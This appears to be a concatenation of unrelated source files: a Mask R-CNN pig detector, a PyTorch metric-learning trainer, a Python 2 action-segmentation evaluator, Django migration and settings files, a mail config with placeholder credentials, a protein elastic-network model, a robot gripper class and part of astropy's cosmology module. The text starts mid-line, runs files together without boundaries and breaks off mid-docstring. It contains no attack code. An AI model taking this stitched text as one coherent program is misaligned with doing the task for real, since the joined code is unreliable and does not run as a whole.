confidence DETECTION_MIN_CONFIDENCE = 0.9 def detect_and_color_splash(model, image_path=None, video_path=None, out_dir=''): assert image_path or video_path class_names = ['BG', 'standing_pig', 'lying_pig'] # Image or video? 
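# The branch below handles the two cases: with --image it loads the file via
# skimage.io.imread, runs a single model.detect call, and renders the result
# with visualize.display_instances; with --video it reads frames through
# cv2.VideoCapture, converts BGR to RGB, detects per frame, and streams the
# annotated frames into a timestamped .wmv via cv2.VideoWriter.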
if image_path: # Run model detection and generate the color splash effect print("Running on {}".format(args.image)) # Read image image = skimage.io.imread(args.image) # Detect objects r = model.detect([image], verbose=1)[0] # Color splash and save visualize.display_instances(image, r['rois'], r['masks'], r['class_ids'], class_names, r['scores'],"image") file_name = "splash_{:%Y%m%dT%H%M%S}.png".format(datetime.datetime.now()) save_file_name = os.path.join(out_dir, file_name) elif video_path: # Video capture vcapture = cv2.VideoCapture(video_path) # width = int(vcapture.get(cv2.CAP_PROP_FRAME_WIDTH)) # height = int(vcapture.get(cv2.CAP_PROP_FRAME_HEIGHT)) width = 1600 height = 1600 fps = vcapture.get(cv2.CAP_PROP_FPS) # Define codec and create video writer file_name = "splash_{:%Y%m%dT%H%M%S}.wmv".format(datetime.datetime.now()) vwriter = cv2.VideoWriter(file_name, cv2.VideoWriter_fourcc(*'MJPG'), fps, (width, height)) count = 0 success = True #For video, we wish classes keep the same mask in frames, generate colors for masks colors = visualize.random_colors(len(class_names)) while success: print("frame: ", count) # Read next image plt.clf() plt.close() success, image = vcapture.read() if success: # OpenCV returns images as BGR, convert to RGB image = image[..., ::-1] # Detect objects r = model.detect([image], verbose=0)[0] # Color splash # splash = color_splash(image, r['masks']) splash = visualize.display_instances(image, r['rois'], r['masks'], r['class_ids'], class_names, r['scores'], colors=colors, making_video=True) # Add image to video writer vwriter.write(splash) count += 1 vwriter.release() print("Saved to ", file_name) if __name__ == '__main__': #app = QApplication(sys.argv) #ex = ExWindow() #sys.exit(app.exec_()) import argparse # Parse command line arguments parser = argparse.ArgumentParser( description='Train Mask R-CNN to detect lying,standing pigs') parser.add_argument('--weights', required=True, metavar="/home/simon/logs/weights.h5", help="Path to weights .h5 file or 'coco'") parser.add_argument('--logs', required=False, default=DEFAULT_LOGS_DIR, metavar="/path/to/logs/", help='Logs and checkpoints directory (default=logs/)') parser.add_argument('--image', required=False, metavar="path or URL to image", help='Image to apply the color splash effect on') parser.add_argument('--video', required=False, metavar="path or URL to video", help='Video to apply the color splash effect on') parser.add_argument('--subset', required=False, metavar="Dataset sub-directory", help="Subset of dataset to run prediction on") args = parser.parse_args() print("Weights: ", args.weights) #config class InferenceConfig(PigConfig): # Set batch size to 1 since we'll be running inference on # one image at a time. 
Batch size = GPU_COUNT * IMAGES_PER_GPU GPU_COUNT = 1 IMAGES_PER_GPU = 1 config = InferenceConfig() config.display() #make model model = modellib.MaskRCNN(mode="inference", config=config, model_dir=args.logs) #load weight path if args.weights.lower() == "coco": weights_path = COCO_WEIGHTS_PATH # Download weights file if not os.path.exists(weights_path): utils.download_trained_weights(weights_path) elif args.weights.lower() == "last": # Find last trained weights weights_path = model.find_last() else: weights_path = args.weights # Load weights print("Loading weights ", weights_path) if args.weights.lower() == "coco": # Exclude the last layers because they require a matching # number of classes model.load_weights(weights_path, by_name=True, exclude=[ "mrcnn_class_logits", "mrcnn_bbox_fc", "mrcnn_bbox", "mrcnn_mask"]) else: model.load_weights(weights_path, by_name=True) #evalutate detect_and_color_splash(model, image_path=args.image, video_path=args.video) #imports from pytorch_metric_learning import losses, miners, samplers, trainers, testers from pytorch_metric_learning.utils import common_functions import pytorch_metric_learning.utils.logging_presets as logging_presets import numpy as np import torchvision from torchvision import datasets, transforms import torch import torch.nn as nn from PIL import Image import logging import faiss import matplotlib.pyplot as plt from cycler import cycler import record_keeper import pytorch_metric_learning logging.getLogger().setLevel(logging.INFO) logging.info("VERSION %s"%pytorch_metric_learning.__version__) from record_keeper import RecordKeeper, RecordWriter # Set the image transforms train_transform = transforms.Compose([transforms.Resize(224), transforms.ToTensor(), transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])]) val_transform = transforms.Compose([transforms.Resize(224), transforms.ToTensor(), transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])]) # loading the data, creating three different sets train_dataset = datasets.ImageFolder('../dataset/train', transform=train_transform) val_dataset = datasets.ImageFolder('../dataset/val', transform=val_transform) test_dataset = datasets.ImageFolder('../dataset/test', transform=val_transform) # Model definition class MLP(nn.Module): # layer_sizes[0] is the dimension of the input # layer_sizes[-1] is the dimension of the output def __init__(self, layer_sizes, final_relu=False): super().__init__() layer_list = [] layer_sizes = [int(x) for x in layer_sizes] num_layers = len(layer_sizes) - 1 final_relu_layer = num_layers if final_relu else num_layers - 1 for i in range(len(layer_sizes) - 1): input_size = layer_sizes[i] curr_size = layer_sizes[i + 1] if i < final_relu_layer: layer_list.append(nn.ReLU(inplace=True)) layer_list.append(nn.Linear(input_size, curr_size)) self.net = nn.Sequential(*layer_list) self.last_linear = self.net[-1] #self.record_these = ["last_linear", "net"] def forward(self, x): return self.net(x) # Initialize models, optimizers and image transforms device = torch.device("cuda" if torch.cuda.is_available() else "cpu") # Set trunk model and replace the softmax layer with an identity function trunk = torchvision.models.resnet18(pretrained=True) trunk_output_size = trunk.fc.in_features trunk.fc = common_functions.Identity() trunk = torch.nn.DataParallel(trunk.to(device)) # Set embedder model. 
This takes in the output of the trunk and outputs 64 dimensional embeddings embedder = torch.nn.DataParallel(MLP([trunk_output_size, 64]).to(device)) # Set optimizers (trying out different learnng rates) #trunk_optimizer = torch.optim.Adam(trunk.parameters(), lr=0.00001, weight_decay=0.0001) #embedder_optimizer = torch.optim.Adam(embedder.parameters(), lr=0.0001, weight_decay=0.0001) trunk_optimizer = torch.optim.Adam(trunk.parameters(), lr=0.0001, weight_decay=0.0001) embedder_optimizer = torch.optim.Adam(embedder.parameters(), lr=0.001, weight_decay=0.0001) # Create the loss, miner, sampler, and package them into dictionaries # Set the loss function loss = losses.TripletMarginLoss(margin=0.1) # Set the mining function miner = miners.TripletMarginMiner(margin=0.1, type_of_triplets="all") #miner = miners.MultiSimilarityMiner(epsilon=0.1) # Set the dataloader sampler # 4 samples each will be returned -> for us m=2 max sampler = samplers.MPerClassSampler(train_dataset.targets, m=2, length_before_new_iter=len(train_dataset)) #sampler = samplers.FixedSetOfTriplets(train_dataset.targets, len(train_dataset)) # Set other training parameters batch_size = 64 num_epochs = 1 # Package the above stuff into dictionaries. models = {"trunk": trunk, "embedder": embedder} optimizers = {"trunk_optimizer": trunk_optimizer, "embedder_optimizer": embedder_optimizer} loss_funcs = {"metric_loss": loss} mining_funcs = {"tuple_miner": miner} # Create the training and testing hooks record_keeper, _, _ = logging_presets.get_record_keeper("example_logs", "example_tensorboard") hooks = logging_presets.get_hook_container(record_keeper) dataset_dict = {"val": val_dataset} model_folder = "example_saved_models" # Create the tester tester = testers.GlobalEmbeddingSpaceTester(end_of_testing_hook = hooks.end_of_testing_hook, dataloader_num_workers = 32) end_of_epoch_hook = hooks.end_of_epoch_hook(tester, dataset_dict, model_folder, test_interval = 1, patience = 1) trainer = trainers.MetricLossOnly(models, optimizers, batch_size, loss_funcs, mining_funcs, train_dataset, sampler=sampler, dataloader_num_workers = 32, end_of_iteration_hook = hooks.end_of_iteration_hook, end_of_epoch_hook = end_of_epoch_hook) #Train the model trainer.train(num_epochs=num_epochs) PATH1 = './SentinelNaip_TripletMarginMiner_trunk.pth' PATH2 = './SentinelNaip_TripletMarginMiner_embed.pth' torch.save(trunk.state_dict(), PATH1) torch.save(embedder.state_dict(), PATH2) # Get a dictionary mapping from loss names to lists loss_histories = hooks.get_loss_history() test_dict = {"test": test_dataset} tester.test(epoch=num_epochs,dataset_dict=test_dict, trunk_model = trunk, embedder_model=embedder) # extract embeddings train_emb,train_lab = tester.get_all_embeddings(train_dataset,trunk_model = trunk, embedder_model=embedder) val_emb, val_lab = tester.get_all_embeddings(val_dataset, trunk_model = trunk, embedder_model=embedder) test_emb, test_lab = tester.get_all_embeddings(test_dataset, trunk_model = trunk, embedder_model=embedder) #The embeddings will be further used for visualisation and classification #Adapt this path to your own architecture np.savetxt('../embeddings/train_emb_triplet',train_emb) np.savetxt('../embeddings/train_lab_triplet',train_lab) np.savetxt('../embeddings/val_emb_triplet',val_emb) np.savetxt('../embeddings/val_lab_triplet',val_lab) np.savetxt('../embeddings/test_emb_triplet',test_emb) np.savetxt('../embeddings/test_lab_triplet',test_lab) evaluateBreakfastActions.py import numpy as np from sys import argv, exit from sklearn.metrics 
import jaccard_similarity_score, adjusted_rand_score, precision_score, f1_score, adjusted_rand_score, fowlkes_mallows_score from scipy import signal import matplotlib.pyplot as plt from os import listdir from os.path import isfile, join, isdir from math import factorial from collections import Counter from math import log from statsmodels.nonparametric.smoothers_lowess import lowess import warnings def warn(*args, **kwargs): pass warnings.warn = warn def movingaverage(interval, window_size): window = np.ones(int(window_size))/float(window_size) return np.convolve(interval, window, 'same') def savitzky_golay(y, window_size, order, deriv=0, rate=1): try: window_size = np.abs(np.int(window_size)) order = np.abs(np.int(order)) except ValueError, msg: raise ValueError("window_size and order have to be of type int") if window_size % 2 != 1 or window_size < 1: raise TypeError("window_size size must be a positive odd number") if window_size < order + 2: raise TypeError("window_size is too small for the polynomials order") order_range = range(order+1) half_window = (window_size -1) // 2 b = np.mat([[k**i for i in order_range] for k in range(-half_window, half_window+1)]) m = np.linalg.pinv(b).A[deriv] * rate**deriv * factorial(deriv) firstvals = y[0] - np.abs( y[1:half_window+1][::-1] - y[0] ) lastvals = y[-1] + np.abs(y[-half_window-1:-1][::-1] - y[-1]) y = np.concatenate((firstvals, y, lastvals)) return np.convolve( m[::-1], y, mode='valid') predFilePath = argv[1] gtFilePath = argv[2] predFiles = sorted([join(predFilePath, f) for f in listdir(predFilePath) if isfile(join(predFilePath, f)) and f.endswith('.txt')]) gtFiles = {} for gtFilePath1 in listdir(gtFilePath): if not isdir(join(gtFilePath, gtFilePath1)): continue # print gtFilePath1 for f in listdir(join(gtFilePath, gtFilePath1)): # print f if f.endswith('.coarse'): gtFiles[f.split('.')[0]] = join(gtFilePath, gtFilePath1, f) avgFrames = [] avgBoundaries = [] avgClasses = [] VoI = [] ARI = [] avgIoD = [] fps=30 winSize = np.ceil(fps/2) // 2 * 2 + 1 print winSize # print gtFiles numVideos=0 for predFile in predFiles: # if 'cereal' not in predFile: # continue numVideos += 1 vidKey = predFile.split('/')[-1].split('_')[:3] vidKey.pop(1) vidKey= '_'.join(vidKey) # print "\n\n", vidKey, predFile vidKey = vidKey.replace('salat', 'salad') vidKey = vidKey.replace('cereals', 'cereal') gtFile = gtFiles[vidKey] gtFrames = [] predFrames = [] predFrames1 = [] predErrors = [] avgFr = [] classNo = 0 BGClass = [] actBoundary = [] # print gtFile with open(gtFile, 'rb') as file: for line in file: # print line data, className = line.replace(' \n', '').replace(' ', '').split(' ') if className == 'SIL': BGClass.append(classNo) fromFrame,toFrame = [int(x) for x in data.split('-')] avgFr.append(toFrame - fromFrame) actBoundary.append(toFrame) # if toFrame - fromFrame == 0: # print gtFile, line for i in range(fromFrame, toFrame+1): gtFrames.append(classNo) classNo += 1 avgFrames.append(np.mean(avgFr)) with open(predFile, 'rb') as file: lineNo = 0 for line in file: data = line.replace('\n', '').split('\t') frameNo,predError = data frameNo, predError = int(frameNo), float(predError) predErrors.append(predError) # print predErrors predErrors_Ori = predErrors predErrors = movingaverage(predErrors, 80) predErrors = np.gradient(np.array(predErrors)).tolist() predBoundaries = signal.argrelextrema(np.array(predErrors), np.greater, order=int(0.57899*200))[0].tolist() predBoundaries.append(len(gtFrames)-1) prevFrame = 0 predClass = 0 for nextFrame in predBoundaries: for i in 
range(prevFrame, nextFrame): predFrames.append(predClass) prevFrame = nextFrame predClass += 1 if len(predFrames) < len(gtFrames): x = gtFrames[:len(predFrames)] y = predFrames else: x = gtFrames y = predFrames[:len(gtFrames)] TP = 0 FP = 0 TN = 0 FN = 0 ignoreClass = 0 d = {x:0 for x in range(classNo)} for i in range(len(y)): if y[i] >= classNo: ignoreClass += 1 if y[i] == x[i]: d[y[i]] += 1 TP += 1 else: FP += 1 p = [] for c,val in d.iteritems(): detNo = sum([1 for i in y if i == c]) if detNo == 0: continue p.append(1.0*val/detNo) p = np.mean(p) avgClasses.append(classNo) print predBoundaries, actBoundary, p avgIoD.append(p) print "MoF", np.mean(avgIoD) 0 # Generated by Django 3.2.4 on 2021-07-01 11:54 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('personal_list', '0002_remove_songlist_songs'), ] operations = [ migrations.AlterField( model_name='songrating', name='rating', field=models.CharField(choices=[('1', 'Appalling'), ('2', 'Horrible'), ('3', 'Very Bad'), ('4', 'Bad'), ('5', 'Average'), ('6', 'Fine'), ('7', 'Good'), ('8', 'Very Good'), ('9', 'Great'), ('10', 'Masterpiece')], default='5', max_length=2), ), ] config.py # mail imap_host = "imap.example.com" smtp_host = "smtp.example.cpm" mail_username = "username" sender = "" mail_passwd = r"password" # senders valid_sender = ("", "", ) valid_prefix = "fwthisfile" # output zipname = "myzip.zip" outsubject = "my_attachment" out_email_address = "" naotohori/cafysis #!/usr/bin/env python # coding: utf-8 # This program was originally coded by as simp.py import scipy import scipy.linalg import pylab import sys class nya(object): def __init__(self, coords, pdb_Bfactors): self.coords = coords self.pdb_Bfactors = pdb_Bfactors self.num_atoms = len(self.coords) def cmpt_graph_mats(self, cutoff=10.0): dist = scipy.linalg.norm self.adj_mat = scipy.zeros((self.num_atoms, self.num_atoms)) self.deg_mat = [0] * self.num_atoms for i in range(self.num_atoms - 1): for j in range(i + 1, self.num_atoms): if dist(self.coords[i, :] - self.coords[j, :]) <= cutoff: self.deg_mat[i] += 1.0 self.deg_mat[j] += 1.0 self.adj_mat[i, j] = 1.0 self.adj_mat[j, i] = 1.0 self.deg_mat = scipy.diag(self.deg_mat) self.lap_mat = self.deg_mat - self.adj_mat def cmpt_graph_eig(self): self.graph_eigval, self.graph_eigvec = scipy.linalg.eigh(self.lap_mat, self.deg_mat) def cmpt_hessian(self): self.hessian = scipy.zeros((3*self.num_atoms, 3*self.num_atoms)) for i in range(self.num_atoms - 1): for j in range(i + 1, self.num_atoms): v_ij = self.coords[j, :] - self.coords[i, :] d2 = sum(v_ij * v_ij) for a in range(3): for b in range(3): self.hessian[3*i + a, 3*j + b] = -v_ij[a] * v_ij[b] / d2 * self.adj_mat[i, j] self.hessian[3*j + b, 3*i + a] = self.hessian[3*i + a, 3*j + b] for i in range(self.num_atoms): for a in range(3): for b in range(a, 3): for j in range(self.num_atoms): if j != i: self.hessian[3*i + a, 3*i + b] += -self.hessian[3*i + a, 3*j + b] self.hessian[3*i + b, 3*i + a] = self.hessian[3*i + a, 3*i + b] def cmpt_en_eig(self): self.en_eigval, self.en_eigvec = scipy.linalg.eigh(self.hessian) def cmpt_inverse_hessian(self): self.inverse_hessian = scipy.linalg.pinv(self.hessian) def cmpt_Bfactors(self): Bfactors = [self.inverse_hessian[3*i,3*i] + self.inverse_hessian[3*i+1, 3*i+1] + self.inverse_hessian[3*i+2, 3*i+2] for i in range(self.num_atoms)] k = sum(self.pdb_Bfactors) / sum(Bfactors) self.Bfactors = [Bfactors[i] * k for i in range(self.num_atoms)] def cmpt_cross_correlation(self): self.cross_correlation = 
scipy.zeros((self.num_atoms, self.num_atoms)) self.norm_cross_correlation = scipy.zeros((self.num_atoms, self.num_atoms)) for i in range(self.num_atoms): for j in range(i, self.num_atoms): self.cross_correlation[i, j] = (self.inverse_hessian[3*i, 3*j] + self.inverse_hessian[3*i+1, 3*j+1] + self.inverse_hessian[3*i+2, 3*j+2]) self.cross_correlation[j, i] = self.cross_correlation[i, j] for i in range(self.num_atoms): for j in range(i, self.num_atoms): if i == j: self.norm_cross_correlation[i, i] = 1.0 else: self.norm_cross_correlation[i, j] = ( self.cross_correlation[i, j] / scipy.sqrt(self.cross_correlation[i, i] * self.cross_correlation[j, j])) self.norm_cross_correlation[j, i] = self.norm_cross_correlation[i, j] def get_lines(filename): lines = [] for line in open(filename): if (line[0:6] == "ATOM " and line[12:16] == " CA " and (line[16:17] == " " or line[16:17] == "A") and line[21:22] == "A"): lines.append(line) return lines def get_coords(lines): def ext_coords(line): try: x = float(line[30:38]) y = float(line[38:46]) z = float(line[46:54]) except ValueError: print("Invalid format(coords)") print(line) quit() return (x, y, z) return [ext_coords(line) for line in lines] def get_Bfactors(lines): def ext_Bfactors(line): try: b = float(line[60:66]) except ValueError: print("Invalid format(B-factors)") print(line) quit() return b return [ext_Bfactors(line) for line in lines] def plot_figs(): pylab.subplot(221, aspect="equal") X, Y = pylab.meshgrid(list(range(ins.num_atoms)), list(range(ins.num_atoms))) pylab.pcolor(X, Y, ins.norm_cross_correlation) pylab.colorbar() pylab.clim(-0.15, 0.15) pylab.title("Cross Correlations") pylab.subplot(222) pylab.plot(pdb_Bfactors, "bo-", label="ex.") pylab.plot(ins.Bfactors, "ro-", label="calc.") pylab.legend() pylab.xlabel("Residue") # pylab.ylabel("a.u.") pylab.title("B factors") pylab.grid() pylab.subplot(223, aspect="equal") X, Y = pylab.meshgrid(list(range(ins.num_atoms)), list(range(ins.num_atoms))) pylab.pcolor(X, Y, ins.adj_mat) pylab.colorbar() pylab.title("Adjacency Mat.") pylab.subplot(224) pylab.plot(ins.graph_eigvec[:, 1], "go-") pylab.xlabel("Residue") pylab.grid() pylab.show() if __name__ == "__main__": filename = sys.argv[1] lines = get_lines(filename) coords = scipy.array(get_coords(lines)) pdb_Bfactors = get_Bfactors(lines) ins = nya(coords, pdb_Bfactors) ins.cmpt_graph_mats() ins.cmpt_graph_eig() ins.cmpt_hessian() ins.cmpt_en_eig() ins.cmpt_inverse_hessian() ins.cmpt_Bfactors() ins.cmpt_cross_correlation() plot_figs() frc6879/Practice-Robot from wpilib.command import Subsystem from wpilib import Servo class Gripper (Subsystem): def __init__ (self, robot): self.robot = robot self.isOpen = True self.left_servo = Servo(3) self.right_servo = Servo(4) def open (self): self.left_servo.set(0.0) self.right_servo.set(1.0) def close (self): self.left_servo.set(0.5) self.right_servo.set(0.5) def toggle (self): (self.close, self.open)[self.isOpen]() 1-10 # -*- coding: utf-8 -*- from .base import * DATABASES = { 'default': { 'ENGINE': 'django.db.backends.postgresql_psycopg2', 'NAME': '{}_local'.format(PROJECT_NAME), 'USER': 'postgres', 'PASSWORD': '', 'HOST': '', 'PORT': '', } } DEBUG = True ALLOWED_HOSTS = ['localhost', '127.0.0.1', '[::1]'] STATUS_PROJECT = 'local' EMAIL_BACKEND = 'django.core.mail.backends.console.EmailBackend' INTERNAL_IPS = ['127.0.0.1'] INSTALLED_APPS += ('debug_toolbar',) DEBUG_TOOLBAR_PANELS = [ 'debug_toolbar.panels.versions.VersionsPanel', 'debug_toolbar.panels.timer.TimerPanel', 
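# ---------------------------------------------------------------------------
# Illustrative usage sketch for the elastic-network class (nya) defined earlier
# ("example_CA.pdb" is a hypothetical file name, not something shipped with this
# code).  It simply mirrors the __main__ block: build the cutoff network from
# chain-A C-alpha coordinates, invert the Hessian, and rescale the fluctuations
# to the PDB B-factors.
lines = get_lines("example_CA.pdb")         # chain-A C-alpha ATOM records
coords = scipy.array(get_coords(lines))
pdb_bfactors = get_Bfactors(lines)
model = nya(coords, pdb_bfactors)
model.cmpt_graph_mats(cutoff=10.0)          # adjacency, degree and Laplacian matrices
model.cmpt_hessian()
model.cmpt_inverse_hessian()
model.cmpt_Bfactors()                       # model.Bfactors is scaled to match pdb_bfactors
model.cmpt_cross_correlation()              # normalized residue-residue correlations
# ---------------------------------------------------------------------------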
'debug_toolbar.panels.settings.SettingsPanel', 'debug_toolbar.panels.headers.HeadersPanel', 'debug_toolbar.panels.request.RequestPanel', 'debug_toolbar.panels.sql.SQLPanel', 'debug_toolbar.panels.staticfiles.StaticFilesPanel', 'debug_toolbar.panels.templates.TemplatesPanel', 'debug_toolbar.panels.cache.CachePanel', 'debug_toolbar.panels.signals.SignalsPanel', 'debug_toolbar.panels.logging.LoggingPanel', 'debug_toolbar.panels.redirects.RedirectsPanel', 'debug_toolbar.panels.profiling.ProfilingPanel', ] MIDDLEWARE += ( 'debug_toolbar.middleware.DebugToolbarMiddleware', 'querycount.middleware.QueryCountMiddleware' ) QUERYCOUNT = { 'THRESHOLDS': { 'MEDIUM': 20, 'HIGH': 50, 'MIN_TIME_TO_LOG': 0, 'MIN_QUERY_COUNT_TO_LOG': 0 }, 'IGNORE_REQUEST_PATTERNS': [r'^/admin/', r'^/media/'], 'IGNORE_SQL_PATTERNS': [], 'DISPLAY_DUPLICATES': 5, 'RESPONSE_HEADER': 'X-DjangoQueryCount-Count' } REST_FRAMEWORK['DEFAULT_AUTHENTICATION_CLASSES']\ .append('rest_framework.authentication.SessionAuthentication') x = int(input()) z = x - 1 i = 2 soma = x s=1 while z <= x: z = int(input()) while soma <= z: soma = soma + x + s if soma <= z: i = i + 1 s=s+1 print(i) # Licensed under a 3-clause BSD style license - see LICENSE.rst import sys import warnings from math import sqrt, pi, exp, log, floor from abc import ABCMeta, abstractmethod import numpy as np from .. import constants as const from ..config import ConfigurationItem from ..utils.misc import isiterable from ..utils.exceptions import AstropyUserWarning from .. import units as u from . import parameters # Originally authored by (), # and modified by () and (). # Many of these adapted from Hogg 1999, astro-ph/9905116 # and Linder 2003, PRL 90, 91301 __all__ = ["FLRW", "LambdaCDM", "FlatLambdaCDM", "wCDM", "FlatwCDM", "Flatw0waCDM", "w0waCDM", "wpwaCDM", "w0wzCDM", "get_current", "set_current", "WMAP5", "WMAP7", "WMAP9", "Planck13"] __doctest_requires__ = {'*': ['scipy.integrate']} # Constants # Mpc in km Mpc_km = (1 * u.Mpc).to(u.km) arcsec_in_radians = 1 / 3600. * pi / 180 arcmin_in_radians = 1 / 60. * pi / 180 # Radiation parameter over c^2 in cgs a_B_c2 = 4 * const.sigma_sb.cgs.value / const.c.cgs.value ** 3 # Boltzmann constant in eV / K kB_evK = const.k_B.decompose().to(u.eV / u.K) DEFAULT_COSMOLOGY = ConfigurationItem( 'default_cosmology', 'no_default', 'The default cosmology to use. Note this is only read on import, ' 'so changing this value at runtime has no effect.') class CosmologyError(Exception): pass class Cosmology(object): """ Placeholder for when a more general Cosmology class is implemented. """ pass class FLRW(Cosmology): """ A class describing an isotropic and homogeneous (Friedmann-Lemaitre-Robertson-Walker) cosmology. This is an abstract base class -- you can't instantiate examples of this class, but must work with one of its subclasses such as `LambdaCDM` or `wCDM`. Parameters ---------- H0 : float or scalar astropy.units.Quantity Hubble constant at z = 0. If a float, must be in [km/sec/Mpc] Om0 : float Omega matter: density of non-relativistic matter in units of the critical density at z=0. Ode0 : float Omega dark energy: density of dark energy in units of the critical density at z=0. Tcmb0 : float or scalar astropy.units.Quantity Temperature of the CMB z=0. If a float, must be in [K]. Default: 2.725. Setting this to zero will turn off both photons and neutrinos (even massive ones) Neff : float Effective number of Neutrino species. Default 3.04. m_nu : astropy.units.Quantity Mass of each neutrino species. 
If this is a scalar Quantity, then all neutrino species are assumed to have that mass. Otherwise, the mass of each species. The actual number of neutrino species (and hence the number of elements of m_nu if it is not scalar) must be the floor of Neff. Usually this means you must provide three neutrino masses unless you are considering something like a sterile neutrino. name : str Optional name for this cosmological object. Notes ----- Class instances are static -- you can't change the values of the parameters. That is, all of the attributes above are read only. """ __metaclass__ = ABCMeta def __init__(self, H0, Om0, Ode0, Tcmb0=2.725, Neff=3.04, m_nu=u.Quantity(0.0, u.eV), name=None): # all densities are in units of the critical density self._Om0 = float(Om0) if self._Om0 < 0.0: raise ValueError("Matter density can not be negative") self._Ode0 = float(Ode0) self._Neff = float(Neff) if self._Neff < 0.0: raise ValueError("Effective number of neutrinos can " "not be negative") self.name = name # Tcmb may have units if isinstance(Tcmb0, u.Quantity): if not Tcmb0.isscalar: raise ValueError("Tcmb0 is a non-scalar quantity") self._Tcmb0 = Tcmb0.to(u.K) else: self._Tcmb0 = float(Tcmb0) * u.K # Hubble parameter at z=0, km/s/Mpc if isinstance(H0, u.Quantity): if not H0.isscalar: raise ValueError("H0 is a non-scalar quantity") self._H0 = H0.to(u.km / u.s / u.Mpc) else: self._H0 = float(H0) * u.km / u.s / u.Mpc # 100 km/s/Mpc * h = H0 (so h is dimensionless) self._h = self._H0.value / 100. # Hubble distance self._hubble_distance = (const.c / self._H0).to(u.Mpc) # H0 in s^-1 H0_s = self._H0.to(1.0 / u.s) # Hubble time self._hubble_time = (1. / H0_s).to(u.Gyr) # critical density at z=0 (grams per cubic cm) self._critical_density0 = (3. * H0_s ** 2 / (8. * pi * const.G.cgs)).cgs # Load up neutrino masses. self._nneutrinos = floor(self._Neff) # We are going to share Neff between the neutrinos equally. 
# In detail this is not correct, but it is a standard assumption # because propertly calculating it is a) complicated b) depends # on the details of the massive nuetrinos (e.g., their weak # interactions, which could be unusual if one is considering sterile # neutrinos) self._massivenu = False if self._nneutrinos > 0 and self._Tcmb0.value > 0: self._neff_per_nu = self._Neff / self._nneutrinos if not isinstance(m_nu, u.Quantity): raise ValueError("m_nu must be a Quantity") m_nu = m_nu.to(u.eV, equivalencies=u.mass_energy()) # Now, figure out if we have massive neutrinos to deal with, # and, if so, get the right number of masses # It is worth the effort to keep track of massless ones seperately # (since they are quite easy to deal with, and a common use case # is to set only one neutrino to have mass) if m_nu.isscalar: # Assume all neutrinos have the same mass if m_nu.value == 0: self._nmasslessnu = self._nneutrinos self._nmassivenu = 0 else: self._massivenu = True self._nmasslessnu = 0 self._nmassivenu = self._nneutrinos self._massivenu_mass = (m_nu.value * np.ones(self._nneutrinos)) else: # Make sure we have the right number of masses # -unless- they are massless, in which case we cheat a little if m_nu.value.min() < 0: raise ValueError("Invalid (negative) neutrino mass" " encountered") if m_nu.value.max() == 0: self._nmasslessnu = self._nneutrinos self._nmassivenu = 0 else: self._massivenu = True if len(m_nu) != self._nneutrinos: raise ValueError("Unexpected number of neutrino masses") # Segregate out the massless ones try: # Numpy < 1.6 doesn't have count_nonzero self._nmasslessnu = np.count_nonzero(m_nu.value == 0) except AttributeError: self._nmasslessnu = len(np.nonzero(m_nu.value == 0)[0]) self._nmassivenu = self._nneutrinos - self._nmasslessnu w = np.nonzero(m_nu.value > 0)[0] self._massivenu_mass = m_nu[w] # Compute photon density, Tcmb, neutrino parameters # Tcmb0=0 removes both photons and neutrinos, is handled # as a special case for efficiency if self._Tcmb0.value > 0: # Compute photon density from Tcmb self._Ogamma0 = a_B_c2 * self._Tcmb0.value ** 4 /\ self._critical_density0.value # Compute Neutrino temperature # The constant in front is (4/11)^1/3 -- see any # cosmology book for an explanation -- for example, # Weinberg 'Cosmology' p 154 eq (3.1.21) self._Tnu0 = 0.7137658555036082 * self._Tcmb0 # Compute Neutrino Omega and total relativistic component # for massive neutrinos if self._massivenu: nu_y = self._massivenu_mass / (kB_evK * self._Tnu0) self._nu_y = nu_y.value self._Onu0 = self._Ogamma0 * self.nu_relative_density(0) else: # This case is particularly simple, so do it directly # The 0.2271... is 7/8 (4/11)^(4/3) -- the temperature # bit ^4 (blackbody energy density) times 7/8 for # FD vs. BE statistics. self._Onu0 = 0.22710731766 * self._Neff * self._Ogamma0 else: self._Ogamma0 = 0.0 self._Tnu0 = u.Quantity(0.0, u.K) self._Onu0 = 0.0 # Compute curvature density self._Ok0 = 1.0 - self._Om0 - self._Ode0 - self._Ogamma0 - self._Onu0 def _namelead(self): """ Helper function for constructing __repr__""" if self.name is None: return "{0:s}(".format(self.__class__.__name__) else: return "{0:s}(name=\"{1:s}\", ".format(self.__class__.__name__, self.name) def __repr__(self): retstr = "{0:s}H0={1:.3g}, Om0={2:.3g}, Ode0={3:.3g}, "\ "Tcmb0={4:.4g}, Neff={5:.3g}, m_nu={6:s})" return retstr.format(self._namelead(), self._H0, self._Om0, self._Ode0, self._Tcmb0, self._Neff, self.m_nu) # Set up a set of properties for H0, Om0, Ode0, Ok0, etc. for user access. 
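# ---------------------------------------------------------------------------
# Illustrative numerical check (standalone, not part of the class): the two
# magic numbers used in the neutrino setup above are the neutrino-to-photon
# temperature ratio (4/11)**(1/3) and, for massless neutrinos,
# 7/8 * (4/11)**(4/3), the density per effective species relative to photons.
print((4.0 / 11.0) ** (1.0 / 3.0))               # 0.7137658555...  (Tnu0 / Tcmb0)
print(7.0 / 8.0 * (4.0 / 11.0) ** (4.0 / 3.0))   # 0.2271073176...  (Onu0 = this * Neff * Ogamma0)
# ---------------------------------------------------------------------------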
# Note that we don't let these be set (so, obj.Om0 = value fails) @property def H0(self): """ Return the Hubble constant as an astropy.units.Quantity at z=0""" return self._H0 @property def Om0(self): """ Omega matter; matter density/critical density at z=0""" return self._Om0 @property def Ode0(self): """ Omega dark energy; dark energy density/critical density at z=0""" return self._Ode0 @property def Ok0(self): """ Omega curvature; the effective curvature density/critical density at z=0""" return self._Ok0 @property def Tcmb0(self): """ Temperature of the CMB as astropy.units.Quantity at z=0""" return self._Tcmb0 @property def Tnu0(self): """ Temperature of the neutrino background as astropy.units.Quantity at z=0""" return self._Tnu0 @property def Neff(self): """ Number of effective neutrino species""" return self._Neff @property def has_massive_nu(self): """ Does this cosmology have at least one massive neutrino species?""" if self._Tnu0.value == 0: return False return self._massivenu @property def m_nu(self): """ Mass of neutrino species""" if self._Tnu0.value == 0: return None if not self._massivenu: # Only massless return u.Quantity(np.zeros(self._nmasslessnu), u.eV) if self._nmasslessnu == 0: # Only massive return u.Quantity(self._massivenu_mass, u.eV) # A mix -- the most complicated case return u.Quantity(np.append(np.zeros(self._nmasslessnu), self._massivenu_mass.value), u.eV) @property def h(self): """ Dimensionless Hubble constant: h = H_0 / 100 